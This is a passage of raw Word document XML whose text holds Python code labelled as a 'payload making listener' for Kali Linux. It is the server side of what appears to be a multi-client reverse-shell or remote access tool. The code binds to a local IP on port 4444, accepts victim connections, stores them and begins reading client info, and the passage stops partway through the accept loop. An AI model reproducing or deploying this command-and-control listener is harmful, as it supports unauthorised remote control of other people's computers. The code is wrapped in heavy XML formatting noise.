        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Implementation of server code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#Start advance payload making listener Kali linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import socket, os, time, threading, sys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from queue import Queue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intThreads = 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arrJobs = [1,2]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>queue = Queue()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arrConnections = []</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strHost = "192.168.1.11"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intPort = 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intBuff = 1024</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>decode_utf = lambda data: data.decode("utf-8")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>remove_quotes = lambda string: string.replace("\"","")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>send = lambda data: conn.send(data)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>recv = lambda buffer: conn.recv(buffer)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>def recvall(buffer):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    bytData = b""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        bytPart = recv(buffer)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        if len(bytPart) == buffer:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            return bytPart</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        bytData += bytPart</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        if len(bytData) == buffer:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            return bytData</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>def create_socket():</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    global objSocket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        objSocket = socket.socket()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        objSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    except socket.error as strError:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("Error </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> creating socket " + str(strError))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>def socket_bind():</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    global objSocket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("Listening on port: " + str(intPort))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        objSocket.bind((strHost, intPort))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        objSocket.listen(20)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    except socket.error as strError:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("Error binding socket " + str(strError)) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        socket_bind()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>def socket_accept():</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            conn, address = objSocket.accept()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            conn.setblocking(1)  # no timeout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            arrConnections.append(conn)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            client_info = decode_utf(conn.recv(intBuff)).split(",")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body Text"/>
        <w:spacing w:before="246"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
